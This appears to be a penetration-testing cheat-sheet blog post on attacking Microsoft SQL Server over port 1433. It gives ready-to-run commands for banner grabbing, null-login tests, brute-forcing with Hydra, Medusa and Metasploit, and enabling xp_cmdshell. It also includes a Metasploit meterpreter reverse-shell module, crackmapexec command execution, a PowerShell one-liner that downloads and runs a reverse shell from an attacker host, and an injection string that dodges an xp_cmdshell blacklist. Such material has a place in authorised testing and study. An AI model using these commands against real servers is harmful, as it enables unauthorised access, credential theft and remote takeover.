MSSQL (Microsoft SQL Server) — Port 1433
✨ Click here for full article
Basic info
MSSQL is designed to store and retrieve data as requested by applications. Its features include:
Default Port: TCP/1433 for standard communication.
Authentication Modes: Windows Authentication Mixed Mode (Windows and SQL Server Authentication)
Common Uses: Data storage for web applications, enterprise systems, and reporting services.
While MSSQL provides robust security features, misconfigurations, weak authentication, and unpatched vulnerabilities can expose it to attacks.
Banner Grabbing
Banner grabbing helps identify the MSSQL server version, authentication modes, and potential vulnerabilities.
Telnet (basic connection test):
telnet <IP> 1433Nmap:
nmap -sV -p 1433 - script ms-sql-info <IP>Example Output:
1433/tcp open ms-sql-s Microsoft SQL Server 2019 RTMMetasploit Framework:
msfconsole
use auxiliary/scanner/mssql/mssql_ping
set RHOSTS <IP>
runAuthentication Bypass Techniques
Null Authentication
If SQL Server is misconfigured, it may allow unauthenticated access:
Testing Null Authentication:
sqsh -S <IP> -U "" -P ""MSSQL Brute Force Attacks
Brute force attacks can help identify weak or default credentials.
Hydra:
hydra -L usernames.txt -P passwords.txt mssql://<IP>Medusa:
medusa -h <IP> -u <username> -P passwords.txt -M mssqlMetasploit Auxiliary Module:
msfconsole
use auxiliary/scanner/mssql/mssql_login
set RHOSTS <IP>
set USER_FILE usernames.txt
set PASS_FILE passwords.txt
runMSSQL Enumeration
Identify Databases:
SELECT name FROM sys.databases;List Users:
SELECT name FROM sys.syslogins;Server Information:
SELECT @@version;Extract Privileges:
SELECT * FROM fn_my_permissions(NULL, 'DATABASE');Automated Enumeration:
Metasploit:
use auxiliary/admin/mssql/mssql_enum
set RHOSTS <IP>
runExploitation Techniques
Command Execution via xp_cmdshell
xp_cmdshell allows executing OS commands from SQL Server.
Enable xp_cmdshell:
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;Execute Commands:
EXEC xp_cmdshell 'whoami';Privilege Escalation
Use known vulnerabilities or misconfigurations to escalate privileges:
- CVE-2020–0618 (SQL Reporting Services RCE): Exploit unpatched SQL Reporting Services.
- Metasploit Module for Privilege Escalation:
use exploit/windows/mssql/mssql_payload
set RHOST <IP>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <your_IP>
runExecute OS Commands
Note that in order to be able to execute commands it’s not only necessary to have xp_cmdshell enabled, but also have the EXECUTE permission on the xp_cmdshell stored procedure. You can get who (except sysadmins) can use xp_cmdshell with:
Use master
EXEC sp_helprotect 'xp_cmdshell'
# Username + Password + CMD command
crackmapexec mssql -d <Domain name> -u <username> -p <password> -x "whoami"
# Username + Hash + PS command
crackmapexec mssql -d <Domain name> -u <username> -H <HASH> -X '$PSVersionTable'
# Check if xp_cmdshell is enabled
SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';
# This turns on advanced options and is needed to configure xp_cmdshell
sp_configure 'show advanced options', '1'
RECONFIGURE
#This enables xp_cmdshell
sp_configure 'xp_cmdshell', '1'
RECONFIGURE
#One liner
EXEC sp_configure 'Show Advanced Options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
# Quickly check what the service account is via xp_cmdshell
EXEC master..xp_cmdshell 'whoami'
# Get Rev shell
EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.13:8000/rev.ps1") | powershell -noprofile'
# Bypass blackisted "EXEC xp_cmdshell"
'; DECLARE @x AS VARCHAR(100)='xp_cmdshell'; EXEC @x 'ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net' -
Comments
Post a Comment